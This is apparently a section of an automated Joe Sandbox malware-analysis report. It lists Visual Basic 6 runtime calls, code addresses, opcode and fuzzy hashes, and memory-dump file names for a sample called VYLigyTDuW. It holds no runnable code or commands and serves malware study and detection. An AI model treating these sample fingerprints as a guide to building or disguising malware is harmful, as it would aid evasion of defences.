                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CopyMove$Chkstk$#526#616#644ErrorNofreeSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 299759716-0
                                                                    • Opcode ID: a0f8164e3867a773ad2ea1d4f3e62d6fbe48e7a8157ab077b85badbe7fa4c803
                                                                    • Instruction ID: fca69512df412a8bd6ac5f0829a80bbfa00efb975074bbd1965f9d8ff9ab74f6
                                                                    • Opcode Fuzzy Hash: a0f8164e3867a773ad2ea1d4f3e62d6fbe48e7a8157ab077b85badbe7fa4c803
                                                                    • Instruction Fuzzy Hash: E031AB71D00209ABCF00EFE1C956EDEBBB5BF44308F54443AA501B71A5EB395A4ACB95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C575
                                                                    • __vbaVarDup.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C58D
                                                                    • #644.MSVBVM60(?,00000003,?,?,00401526), ref: 0054C598
                                                                    • __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401526), ref: 0054C5A2
                                                                    • #697.MSVBVM60(?,00000000,?,00000000,?,00000002,?), ref: 0054C5FE
                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C619
                                                                    • __vbaVarMove.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C623
                                                                    • __vbaFreeVar.MSVBVM60(?,00000008,00000000,?,00000000,?,00000000,?,00000002,?), ref: 0054C62B
                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0054C64C
                                                                    • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0054C656
                                                                    • __vbaFreeVar.MSVBVM60(0054C695,00000000,?,00000000,?,00000002,?), ref: 0054C68F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$FreeMove$#644#697Chkstk
                                                                    • String ID:
                                                                    • API String ID: 4043317205-0
                                                                    • Opcode ID: 11fcd46ebd7e5873753544fc1a3602888c33fd0c3b7a8c0cdb12f4b7f3a8cc6c
                                                                    • Instruction ID: dac2e6ef9e8b29cc94df0b649b97722a0f8c591a29ecb09df45362f36ba6f972
                                                                    • Opcode Fuzzy Hash: 11fcd46ebd7e5873753544fc1a3602888c33fd0c3b7a8c0cdb12f4b7f3a8cc6c
                                                                    • Instruction Fuzzy Hash: 3731FFB1901208AFCB40EF95DD85EDE7BBCFB54308F10456AF041AB1A1DB78AA09DB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526), ref: 0054ED1E
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00401360,?,?,?,00000000,00401526), ref: 0054ED37
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054ED69
                                                                    • #526.MSVBVM60(?,00007FFF), ref: 0054ED8F
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00007FFF), ref: 0054ED98
                                                                    • __vbaStrMove.MSVBVM60(?,?,00007FFF), ref: 0054EDA2
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00007FFF), ref: 0054EDAA
                                                                    • #644.MSVBVM60(?,?,?,00007FFF), ref: 0054EDB2
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040AC14,0000000C), ref: 0054EDEA
                                                                    • __vbaFreeObj.MSVBVM60(0054EE23), ref: 0054EE1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresultMove$#526#644AddrefChkstk
                                                                    • String ID:
                                                                    • API String ID: 2274909516-0
                                                                    • Opcode ID: 7c45dc3ef16690f710e02e8a541f5ab013913157b6af3020d8fe52e566eb87ff
                                                                    • Instruction ID: 671d62be4eab6866a5eb24881cbda399b80a69873a8e6d53d4357914902f55c5
                                                                    • Opcode Fuzzy Hash: 7c45dc3ef16690f710e02e8a541f5ab013913157b6af3020d8fe52e566eb87ff
                                                                    • Instruction Fuzzy Hash: 2F31E071D00209AFDF01EBA5EC86FEEBBB8BF04308F10842AF111B61A1DB7955559F55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C8CB
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054C8EC
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054C8F6
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054C8FC
                                                                    • __vbaSetSystemError.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401526), ref: 0054C921
                                                                    • __vbaFreeStr.MSVBVM60(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000,?,?,?,?,00401526), ref: 0054C92F
                                                                    • __vbaAryLock.MSVBVM60(?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C95C
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 0054C983
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,?,?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0054C98C
                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 0054C999
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$#644ChkstkFreeLockNofreeUnlockVarg
                                                                    • String ID:
                                                                    • API String ID: 2579818117-0
                                                                    • Opcode ID: 1f45dd0e7f012a2d6a78ca0c6e89c1bcb86a369ba553689d3a6593c186d6e592
                                                                    • Instruction ID: 896229b02a6ce180388516fc29f2a4a9bad2685a2558b090e87f12eab4806fbb
                                                                    • Opcode Fuzzy Hash: 1f45dd0e7f012a2d6a78ca0c6e89c1bcb86a369ba553689d3a6593c186d6e592
                                                                    • Instruction Fuzzy Hash: 2531F075900209BFDF00EB95CD56FAE7BB8FF04704F14442AF501BB1A1D679A940CB69
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054F67F
                                                                    • __vbaVarDup.MSVBVM60(?,00000008,?,?,00401526), ref: 0054F697
                                                                    • #653.MSVBVM60(?,?,?,00000008,?,?,00401526), ref: 0054F6A4
                                                                    • __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401526), ref: 0054F6AD
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054F6C6
                                                                    • #632.MSVBVM60(?,?,00000001,00000002), ref: 0054F6FB
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F70C
                                                                    • __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054F716
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054F725
                                                                    • __vbaFreeVar.MSVBVM60(0054F768), ref: 0054F762
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$#632#653ChkstkListMove
                                                                    • String ID:
                                                                    • API String ID: 2607714180-0
                                                                    • Opcode ID: 8b36459b788b84acfdcb111c424febc811a248507acd243f79d00c6536bf71ad
                                                                    • Instruction ID: a3a231060531e0de86830821634bafb016e253af35a50f4f255e236a5f0c7dd8
                                                                    • Opcode Fuzzy Hash: 8b36459b788b84acfdcb111c424febc811a248507acd243f79d00c6536bf71ad
                                                                    • Instruction Fuzzy Hash: 16219872C0014DABDB10EBD5C886EDEBBBCFF04308F54452AF501B7191E778A5898B95
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CD74
                                                                    • __vbaStrCat.MSVBVM60(0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CD98
                                                                    • __vbaStrMove.MSVBVM60(0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDA2
                                                                    • __vbaStrCat.MSVBVM60(0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDAD
                                                                    • __vbaStrMove.MSVBVM60(0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDB7
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDBD
                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000000,00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000,?,?,?,?,00401526), ref: 0054CDCA
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,000000FF,00000000,00000000,0040AC08,00000000,0040AF90,0040AF78,?,00000004,00000000), ref: 0054CDD9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$ChkstkErrorFreeListSystem
                                                                    • String ID:
                                                                    • API String ID: 3065699893-0
                                                                    • Opcode ID: 10bf416ccd1d281886d5f9d9a4d97ed64426089d72a1d9df50e1dbd563c5f824
                                                                    • Instruction ID: 8077857ec8f06ac6f827f793ba9b34a51445d08b7ba732c6ab21e46ba098002d
                                                                    • Opcode Fuzzy Hash: 10bf416ccd1d281886d5f9d9a4d97ed64426089d72a1d9df50e1dbd563c5f824
                                                                    • Instruction Fuzzy Hash: C50144B1A402087BD700A7958C43FAF7B6CAB41B48F20453BB501B70D1DABC594546AE
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054C9ED
                                                                      • Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB
                                                                    • #644.MSVBVM60(?,0056E371,?,?,?,?,00401526), ref: 0054CA10
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000005,00000000,?,00000000,?,0056E371,?,?,?,?,00401526), ref: 0054CA3B
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054CA4C
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054CA62
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054CA6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2226984211-0
                                                                    • Opcode ID: 614c0eadf750dbd20b26a66969860a9958a329fb45584ee8b7d14761b268cce4
                                                                    • Instruction ID: e0f13fc114654bb1a15210baa5efcd9a0d7f71c9935d769580fc084064f631c0
                                                                    • Opcode Fuzzy Hash: 614c0eadf750dbd20b26a66969860a9958a329fb45584ee8b7d14761b268cce4
                                                                    • Instruction Fuzzy Hash: C121DE7194020DABDF00DFA5CD46FEE7BB8FB04748F144429F501FB291D679A9008B65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054B406
                                                                      • Part of subcall function 0054B4D6: __vbaChkstk.MSVBVM60(00000016,00401526,?,?,?,0054B428,00000016,?,?,?,?,00401526), ref: 0054B4F1
                                                                      • Part of subcall function 0054B4D6: __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B52A
                                                                      • Part of subcall function 0054B4D6: __vbaAryLock.MSVBVM60(00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B594
                                                                      • Part of subcall function 0054B4D6: #644.MSVBVM60(?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5B0
                                                                      • Part of subcall function 0054B4D6: __vbaAryUnlock.MSVBVM60(00000016,?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5BC
                                                                    • #644.MSVBVM60(?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B444
                                                                    • #644.MSVBVM60(?,00000016,?,?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B45E
                                                                    • #644.MSVBVM60(005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016,?,?,?,?,00401526), ref: 0054B480
                                                                    • #644.MSVBVM60(?,?,?,005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016), ref: 0054B497
                                                                    • #644.MSVBVM60(?,?,?,?,005497A7,00000016,?,?,00000016,?,?,?,?,?,00000016), ref: 0054B4A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: #644$__vba$Chkstk$LockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 2110399347-0
                                                                    • Opcode ID: fe0142b8e8542b114497ebeb7ee0da0d88ee8ba0a563c4669415466abda16b50
                                                                    • Instruction ID: 2b64426ad1c69072ed6cd4913d655284d7325d5129e7b8df0e1bc3e14bb98972
                                                                    • Opcode Fuzzy Hash: fe0142b8e8542b114497ebeb7ee0da0d88ee8ba0a563c4669415466abda16b50
                                                                    • Instruction Fuzzy Hash: BE21C971C00209ABDF00EFA5CD45AEFBBB9FF04348F10442AF110B6261D7799A119F65
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054CAE9
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401526), ref: 0054CB01
                                                                    • __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,00401526), ref: 0054CB0B
                                                                    • #644.MSVBVM60(00000000,?,00000000,?,?,?,?,00401526), ref: 0054CB11
                                                                    • __vbaVarMove.MSVBVM60 ref: 0054CB26
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054CB2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkFreeMoveNofreeVarg
                                                                    • String ID:
                                                                    • API String ID: 2413382268-0
                                                                    • Opcode ID: a1a0014cd305dd055a153db347bfe18a4f620a1b2f3d8eee7b4248e9a83d0b28
                                                                    • Instruction ID: 91516e5a770fb438fed177fe4cd4db63987d6c1928b45cf1ec190f2e89d7078b
                                                                    • Opcode Fuzzy Hash: a1a0014cd305dd055a153db347bfe18a4f620a1b2f3d8eee7b4248e9a83d0b28
                                                                    • Instruction Fuzzy Hash: B6F0FF71800248ABCB10EBA5CC96FCEBFBCEF44758F54452AF001B71A1D77866498B99
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000016,00401526,?,?,?,0054B428,00000016,?,?,?,?,00401526), ref: 0054B4F1
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,00000011,00000001,00004000,00000000,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B52A
                                                                    • __vbaAryLock.MSVBVM60(00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B594
                                                                    • #644.MSVBVM60(?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5B0
                                                                    • __vbaAryUnlock.MSVBVM60(00000016,?,00000016,005C9368,?,?,?,00000016,00401526,?,?,?,0054B428,00000016), ref: 0054B5BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644ChkstkLockRedimUnlock
                                                                    • String ID:
                                                                    • API String ID: 972739294-0
                                                                    • Opcode ID: a878a8a776cfe9b8e240bda9f778573623ae2bd9eba9b5c6304147e059cb6d47
                                                                    • Instruction ID: e3dd284540c14f88cdfda067450419366d4117ffcb71cf3fe1ab9ffb603cef27
                                                                    • Opcode Fuzzy Hash: a878a8a776cfe9b8e240bda9f778573623ae2bd9eba9b5c6304147e059cb6d47
                                                                    • Instruction Fuzzy Hash: 98310778A00609AFEB00CF98D885FEDBBF4FB18704F148599E505AB3A1D775E841DB94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C6048
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C6089
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00401448), ref: 005C60AD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C60D6
                                                                    • __vbaFreeObj.MSVBVM60 ref: 005C60E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$AddrefCheckChkstkFreeHresultNew2
                                                                    • String ID:
                                                                    • API String ID: 3149954519-0
                                                                    • Opcode ID: 3cc8e18852874f16250759c8c11ac248af0d1e09a773f61fb59e92ea7045df2a
                                                                    • Instruction ID: 0d89afd342ce7559d2466a9def96e7cad074bdb0e7ff9c810e223526dab3ee01
                                                                    • Opcode Fuzzy Hash: 3cc8e18852874f16250759c8c11ac248af0d1e09a773f61fb59e92ea7045df2a
                                                                    • Instruction Fuzzy Hash: A521B3B1900209EFCB009F95C84AF9DBFB4FB08744F10842AF405BB2A1C7799A55DF98
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A71C,005C92CC,00000000), ref: 0054C493
                                                                      • Part of subcall function 0054CAB5: __vbaChkstk.MSVBVM60(?,0054C4AF,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054CABB
                                                                    • #644.MSVBVM60(?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000,00000000), ref: 0054C4BF
                                                                    • #644.MSVBVM60(00000001,?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004,00000000,00000000), ref: 0054C4CE
                                                                    • #644.MSVBVM60(?,00000000,00000001,?,0054C231,?,00000008,?,00000000,00401526,?,?,?,0054C194,00000000,-00000004), ref: 0054C4EA
                                                                    • #644.MSVBVM60(00000000,?,00000004,?,00000000,00000001,?,0054C231,?,00000008,?,00000000,00401526), ref: 0054C511
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: #644$Chkstk__vba
                                                                    • String ID:
                                                                    • API String ID: 1305800526-0
                                                                    • Opcode ID: 6b2d9cc96512b800c7bd6564621f2dd06ac5b1ca1f72472667c06c8f3388b359
                                                                    • Instruction ID: 116bbdc1301f608e60684559796d40f64f9ea6d4afa89032dd28bdacbce4ad74
                                                                    • Opcode Fuzzy Hash: 6b2d9cc96512b800c7bd6564621f2dd06ac5b1ca1f72472667c06c8f3388b359
                                                                    • Instruction Fuzzy Hash: C4116D71900609BFDB00DFA5DD4AEDE7FB8FB45708F14046AF001B61A1D675AD00DA68
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054B311
                                                                    • #644.MSVBVM60(?), ref: 0054B31A
                                                                    • #644.MSVBVM60(?,0054B190,00000000,?), ref: 0054B32F
